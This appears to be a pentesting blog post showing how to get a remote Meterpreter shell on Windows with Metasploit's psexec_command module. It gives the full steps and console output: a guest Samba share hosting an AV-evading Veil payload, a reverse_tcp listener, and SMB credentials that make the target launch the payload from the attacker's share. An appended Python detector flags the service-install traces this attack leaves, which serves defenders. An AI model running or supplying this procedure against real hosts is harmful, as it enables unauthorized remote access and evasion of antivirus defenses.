Moar Shellz!
Posted by Spoonman1091 in Uncategorized on May 12, 2014
Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
- Metasploit psexec
- Metasploit psexec_psh
- Windows psexec executable
- Impacket psexec python script
- pth-winexe
- pth-wmis
- smbexec
- Veil-Catapult
All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.
First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one of the easiest ways to create AV-safe executables. Once we have an executable, we simply create an SMB share for our targets to access.
Add this section to “/etc/samba/smb.conf”:
[payloads$]
comment = Payloads
path = /root/veil-output/compiled
browseable = yes
read only = yes
guest ok = yes
public = yes
In Kali Linux, Samba is not running by default, so we need to start it:
root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.
Next, we start up Metasploit and open a listener:
root@kali:~# msfconsole

I love shells --egypt

Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
msf exploit(handler) > [*] Starting the payload handler...
Now, we set up “psexec_command” and configure the module to run the executable payload directly from our SMB share:
msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe
COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec
Pull the trigger and cross your fingers:
msf auxiliary(psexec_command) > exploit
[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
It does leave a randomly named .txt file in the “Windows\Temp” directory that you need to clean up manually, but that’s it! You can also point RHOSTS at a text file listing multiple remote hosts to target.
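Seen from the defender's side, the run above leaves two things worth alerting on: a new service whose image path launches a binary from a remote share, and an output file with a 16-letter random name under \WINDOWS\Temp. The following is an added example, not code from the original post or from the Metasploit module, that scores service-installation records (Windows System event ID 7045, flattened here to constructed `name|image path` lines) for those traits; the exact image path psexec_command registers is assumed, not taken from the page.

```python
import re
from typing import List, Tuple

# Windows records each new service installation as System event ID 7045,
# carrying the service name and the image path it will run. These records
# are constructed for this example (name|image path), not real log output.
# The third line is what a run like the one above is ASSUMED to leave: a
# cmd wrapper that starts a binary from a remote share and redirects output
# to a randomly named .txt under \WINDOWS\Temp (the file the cleanup failed on).
SAMPLE_7045 = [
    "Spooler|C:\\Windows\\System32\\spoolsv.exe",
    "BackupAgent|\"C:\\Program Files\\Vendor\\agent.exe\" -svc",
    "xRqLpWmZaBcDeFgH|%COMSPEC% /C start \\\\192.168.81.196\\payloads$\\TrustedSec39.exe "
    "> \\WINDOWS\\Temp\\FtHThcznCVkttXJy.txt",
]

UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")                     # \\host\share\...
TEMP_TXT = re.compile(r"\\WINDOWS\\Temp\\[A-Za-z]{16}\.txt", re.I)   # 16 random letters, as seen above
RANDOM_NAME = re.compile(r"^[A-Za-z]{16}$")                           # service name with no vendor words
SHELL_WRAPPER = re.compile(r"(%COMSPEC%|cmd(\.exe)?)\s+/c", re.I)     # service is just a cmd /c wrapper


def score_service_install(name: str, image_path: str) -> List[str]:
    """Return the reasons a 7045 record looks like remote command execution."""
    reasons = []
    if UNC_PATH.search(image_path):
        reasons.append("image_path_on_remote_share")
    if TEMP_TXT.search(image_path):
        reasons.append("output_redirected_to_random_temp_txt")
    if SHELL_WRAPPER.search(image_path):
        reasons.append("service_is_cmd_wrapper")
    if RANDOM_NAME.match(name):
        reasons.append("random_service_name")
    return reasons


def find_suspicious(records: List[str], min_hits: int = 2) -> List[Tuple[str, List[str]]]:
    """Parse name|image_path records; keep those with at least min_hits reasons."""
    hits = []
    for rec in records:
        name, _, image_path = rec.partition("|")
        reasons = score_service_install(name, image_path)
        if len(reasons) >= min_hits:          # one trait alone is too noisy
            hits.append((name, reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_7045):
        print(f"suspicious service {name}: {', '.join(reasons)}")
```

Requiring two traits keeps a lone 16-letter service name or a legitimate UNC-hosted service from firing on its own; the same TEMP_TXT pattern can be run over a directory listing of \WINDOWS\Temp to find the leftover file the module could not remove.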
MOAR SHELLZ!